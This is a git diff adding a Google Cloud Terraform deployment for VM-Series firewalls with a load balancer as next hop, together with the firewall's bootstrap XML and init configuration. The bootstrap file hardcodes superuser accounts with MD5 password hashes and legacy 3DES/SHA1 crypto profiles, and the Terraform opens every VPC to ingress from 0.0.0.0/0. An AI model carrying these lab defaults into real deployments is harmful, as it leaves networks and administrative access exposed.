\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml
new file mode 100644
index 00000000..7e2a3a37
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml
@@ -0,0 +1,890 @@
+<?xml version="1.0"?>
+<config version="8.1.0" urldb="paloaltonetworks">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+          </ethernet>
+          <loopback>
+            <units>
+              <entry name="loopback.1">
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <ip>
+                  <entry name="100.64.0.1/32"/>
+                </ip>
+                <interface-management-profile>health-check</interface-management-profile>
+              </entry>
+            </units>
+          </loopback>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="health-check">
+              <http>no</http>
+              <ssh>yes</ssh>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+              <member>loopback.1</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="health-check-35.191.0.0n16">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.12.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>35.191.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="health-check-130.211.0.0n22">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.12.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>130.211.0.0/22</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="peer1">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.12.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>10.10.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="peer2">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.12.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>10.10.2.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>PA-VM</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                  <member>loopback.1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="allow-all-out-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="allow-health-check">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>35.191.0.0/16</member>
+                    <member>130.211.0.0/22</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <rule-type>universal</rule-type>
+                </entry>
+                <entry name="EW">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>drop</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <nat>
+              <rules>
+                <entry name="outbound-hide">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="hc-nat">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>35.191.0.0/16</member>
+                    <member>130.211.0.0/22</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>ethernet1/1</to-interface>
+                  <dynamic-destination-translation>
+                    <translated-address>100.64.0.1</translated-address>
+                  </dynamic-destination-translation>
+                </entry>
+                <entry name="EW">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+              </rules>
+            </nat>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+                <member>loopback.1</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <host>client</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <reset-both/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <host>client</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <reset-both/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <host>client</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <reset-both/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <host>client</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <host>client</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <host>server</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <reset-both/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <host>server</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <reset-both/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <host>server</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <reset-both/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <host>server</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-low">
+                    <host>server</host>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/deleteme b/gcp/adv-peering-with-lbnh/deleteme
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/deleteme
@@ -0,0 +1 @@
+
diff --git a/gcp/adv-peering-with-lbnh/guide.pdf b/gcp/adv-peering-with-lbnh/guide.pdf
new file mode 100644
index 00000000..bac56ad0
Binary files /dev/null and b/gcp/adv-peering-with-lbnh/guide.pdf differ
diff --git a/gcp/adv-peering-with-lbnh/ilbnh.tf b/gcp/adv-peering-with-lbnh/ilbnh.tf
new file mode 100644
index 00000000..3c7bc041
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/ilbnh.tf
@@ -0,0 +1,67 @@
+provider "google-beta" {
+  credentials = "${var.main_project_authfile}"
+  project     = "${var.main_project}"
+  region      = "${var.region}"
+  alias       = "ilbnh"
+}
+
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH
+#************************************************************************************
+module "bootstrap_ilbnh" {
+  source                = "./modules/create_bootstrap_bucket_ilbnh/"
+  bucket_name           = "vmseries-ilbnh"
+  randomize_bucket_name = true
+  file_location         = "bootstrap_files_ilbnh/"
+  enable_ilbnh          = "${var.enable_ilbnh}"
+  config                = ["init-cfg.txt", "bootstrap.xml"]                                                                          // default []
+  license               = ["authcodes"]                                                                                              // default []
+ # content               = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software              = ["PanOS_vm-9.0.0"]                                                                                        // default []
+}
+
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH
+#************************************************************************************
+module "vm_fw_ilbnh" {
+  source          = "./modules/create_vmseries_ilbnh/"
+  fw_names        = ["vmseries03", "vmseries04"]
+  fw_machine_type = "n1-standard-4"
+  fw_zones        = ["${var.region}-a", "${var.region}-b"]
+  fw_subnetworks  = ["${module.ilb_trust.subnetwork_self_link[0]}", "${module.ilb_mgmt.subnetwork_self_link[0]}", "${module.ilb_untrust.subnetwork_self_link[0]}"]
+  enable_ilbnh    = "${var.enable_ilbnh}"
+  fw_nic0_ip = ["192.168.12.4", "192.168.12.5"] // default [""] - enables dynamically assigned IP
+  fw_nic1_ip = ["192.168.10.4", "192.168.10.5"]
+  fw_nic2_ip = ["192.168.11.4", "192.168.11.5"]
+
+  fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}"
+  fw_ssh_key          = "admin:${var.vmseries_ssh_key}"
+  fw_image            = "${var.vmseries_image}"
+
+  create_instance_group = true
+  instance_group_names  = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group"
+
+  dependencies = [
+    "${module.bootstrap_ilbnh.completion}",
+  ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+module "vmseries_internal_lb_ilbnh" {
+  source                  = "./modules/create_ilbnh/"
+  internal_lb_name_ilbnh  = "ilbnh"
+  internal_lb_ports_ilbnh = "22"
+  subnetworks             = ["${module.ilb_trust.subnetwork_self_link[0]}"]
+  internal_lbnh_ip        = "192.168.12.6"
+  enable_ilbnh            = "${var.enable_ilbnh}"
+  backends  = [
+    {
+      group = "${module.vm_fw_ilbnh.instance_group[0]}"
+    },
+    {
+      group = "${module.vm_fw_ilbnh.instance_group[1]}"
+    },
+  ]
+}
diff --git a/gcp/adv-peering-with-lbnh/ilbnh_override.tf b/gcp/adv-peering-with-lbnh/ilbnh_override.tf
new file mode 100644
index 00000000..d3bb02dd
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/ilbnh_override.tf
@@ -0,0 +1,7 @@
+#************************************************************************************
+# ILBNH
+#************************************************************************************
+variable "enable_ilbnh" {
+  description = "If set to true, enable ILB as Next Hop"
+  default     = true
+}
diff --git a/gcp/adv-peering-with-lbnh/images/Overview.png b/gcp/adv-peering-with-lbnh/images/Overview.png
new file mode 100644
index 00000000..5c1924ba
Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/Overview.png differ
diff --git a/gcp/adv-peering-with-lbnh/images/peering.png b/gcp/adv-peering-with-lbnh/images/peering.png
new file mode 100644
index 00000000..b4fcae29
Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/peering.png differ
diff --git a/gcp/adv-peering-with-lbnh/images/routes.png b/gcp/adv-peering-with-lbnh/images/routes.png
new file mode 100644
index 00000000..244156c9
Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/routes.png differ
diff --git a/gcp/adv-peering-with-lbnh/images/web.jpg b/gcp/adv-peering-with-lbnh/images/web.jpg
new file mode 100644
index 00000000..16d24561
Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/web.jpg differ
diff --git a/gcp/adv-peering-with-lbnh/main.tf b/gcp/adv-peering-with-lbnh/main.tf
new file mode 100644
index 00000000..9233d3e9
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/main.tf
@@ -0,0 +1,196 @@
+provider "google" {
+  credentials = "${var.main_project_authfile}"
+  project     = "${var.main_project}"
+  region      = "${var.region}"
+}
+
+#************************************************************************************
+# CREATE VPCS - MGMT, UNTRUST, TRUST
+#************************************************************************************
+module "vpc_mgmt" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "mgmt-vpc"
+  subnetworks       = ["mgmt-subnet"]
+  ip_cidrs          = ["192.168.0.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "vpc_untrust" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "untrust-vpc"
+  subnetworks       = ["untrust-subnet"]
+  ip_cidrs          = ["192.168.1.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "trust-vpc"
+  subnetworks       = ["trust-subnet"]
+  ip_cidrs          = ["192.168.2.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "ilb_mgmt" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "ilb-mgmt-vpc"
+  subnetworks       = ["ilb-mgmt-subnet"]
+  ip_cidrs          = ["192.168.10.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "ilb_untrust" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "ilb-untrust-vpc"
+  subnetworks       = ["ilb-untrust-subnet"]
+  ip_cidrs          = ["192.168.11.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+module "ilb_trust" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "ilb-trust-vpc"
+  subnetworks       = ["ilb-trust-subnet"]
+  ip_cidrs          = ["192.168.12.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+}
+
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP
+#************************************************************************************
+module "bootstrap" {
+  source                = "./modules/create_bootstrap_bucket/"
+  bucket_name           = "vmseries-adv-peering"
+  randomize_bucket_name = true
+  file_location         = "bootstrap_files/"
+  
+  config                = ["init-cfg.txt", "bootstrap.xml"]                                                                          // default []
+  license               = ["authcodes"]                                                                                              // default []
+ # content               = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software              = ["PanOS_vm-9.0.0"]                                                                                        // default []
+}
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC)
+#************************************************************************************
+module "vm_fw" {
+  source          = "./modules/create_vmseries/"
+  fw_names        = ["vmseries01", "vmseries02"]
+  fw_machine_type = "n1-standard-4"
+  fw_zones        = ["${var.region}-a", "${var.region}-b"]
